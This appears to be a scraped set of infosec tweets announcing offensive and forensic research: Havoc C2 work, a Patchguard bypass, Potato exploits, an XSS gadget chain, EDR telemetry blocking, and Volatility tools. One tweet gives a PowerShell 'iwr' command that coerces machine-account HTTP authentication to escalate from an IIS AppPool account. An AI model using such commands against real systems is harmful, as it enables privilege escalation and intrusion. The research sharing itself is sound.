I haven't posted anything about Havoc in a while so imma share something I have been working on. Wrote a custom VM/Interpreter (based on the RISC-V instruction set) to execute exploits and other arbitrary code.
The client is now fully extendable and scriptable via the Python API
Excited to share my latest article: PgC - a novel approach to disable Patchguard during runtime using basic memory management principles.
It has worked against every version of Patchguard for the last 7 years, without needing any updates!
https://t.co/H5dDddpuMP
Didn't check the code yet, but looks like SilverPotato and CertifiedDCOM have a working public weaponized tool by now:
https://t.co/xxxKppn0n6
That's huge news from my perspective🔥
I just published the long-awaited Part 2 to my PCIe blog post series - "All About Memory: MMIO, DMA, TLPs, and more!"
This post also includes a companion experiment where I dive into what pcileech looks like over a PCIe protocol analyzer. Please enjoy!
https://t.co/wAD7HYG6IW
Here is my #Friday #giveaways!
Like, retweet and share with your network... I'll randomly choose on Monday 4/1 two winners to get the full "C5W Certified Malware Analysis" course and certification for FREE... You should not miss this! #DFIR #Malware
https://t.co/iUg1QScZqX
Exciting news: VolWeb 2.0 is out! This digital forensics memory analysis platform leverages the capabilities of @volatility 3 framework. With significant enhancements, it now offers improved flexibility and scalability! https://t.co/CC54A8d1gm.
New lab 🏰 for the GOAD project 🥳: SCCM
You can now test the SCCM/MECM attacks locally on VirtualBox or VMware.
More information here:
https://t.co/BvAZgLSHQr
Repository here: https://t.co/mi3rP9hC1H
Thx again @KenjiEndo15 for your help building this!
I just spent the last few months of my life reverse engineering the Windows 10 parallel loader and figuring out how it does concurrency. Updates have now been published!
https://t.co/iQtWoJbwep
Over the past few months, I've contributed to the https://t.co/7cw0Dyv8Cm repository to incorporate forensic packages. As a result, I've developed scripts to automate VM installation for reverse engineering, maldev and forensic purposes.
👇
https://t.co/2rU9EyZIDH
I documented https://t.co/tjZc5A8NgE and made 'low alignment PEs' (PoCs @ https://t.co/9nSpKDlFis) around 2009 but I'm pretty sure this was known before.
Any early case of ITW low-align PE? cc @Hexacorn @a2_qkumba @hasherezade @rwfpl
Challenge time is now over ⏰
TL;DR
- HTML injection
- Axios DOM Based CSPP
- Axios CSPP response overwrite gadget
- jQuery DOM Clobbering + CSPP selector overwrite gadgets
- Setting src attr to "javascript:" for each HTML node ➝ XSS
Detailed writeup 👇
https://t.co/xcRXx4jiZz
Did you know you don't need to use a Potato exploit to go from an IIS AppPool account to admin or SYSTEM?
Simply use:
powershell iwr http://192.168.56.1 -UseDefaultCredentials
To get an HTTP coercion from the machine account.
👇🧵
OST cannot be stopped. Here is a technique we tested internally 9 months ago: blocking EDR telemetry by leveraging the Windows Filtering Platform. We considered it so evil that we didn't publish it at that time. It was pointless; now here it is by @netero_1010: https://t.co/TxxJrefTcW
Exegol holiday release is live 🎄🎁🎅
New remote graphical desktop, image entrypoint, container startup script, new tools, improved pipeline, doc, etc. Many big things!
https://t.co/R6K6iOqgUf
https://t.co/TwVCkgRQ2a
gg to the team @Dramelac_ @QU35T_TV 👏 and all contributors.
Read our latest blog to find out how our Security Research Team reverse-engineered Windows Defender to uncover previously undocumented artefacts, which can now be recovered using Dissect!
https://t.co/zpgZ8UMFkc
I have made 2 writeups for #ECSC2023 and #DGhAck. For the 2nd one, I used https://t.co/HD4XPjqVQ2
[1] Recovering a PDF using the DataRun of $LogFile
> https://t.co/jlqgXrv7Im
[2] Decrypting Empire C2 communication by extracting the private key from memory
> https://t.co/JPFTys7afX
Time to make @volatility 3 compatible with modern Windows hibernation file analysis.
Blog post: https://t.co/csNyxyZqO5
Feature: https://t.co/9UjMtS4TVp
Special thanks to @chadtilbury who gave me the motivation and @jtsylve, @vicomarziale, @nolaforensix for the incredible work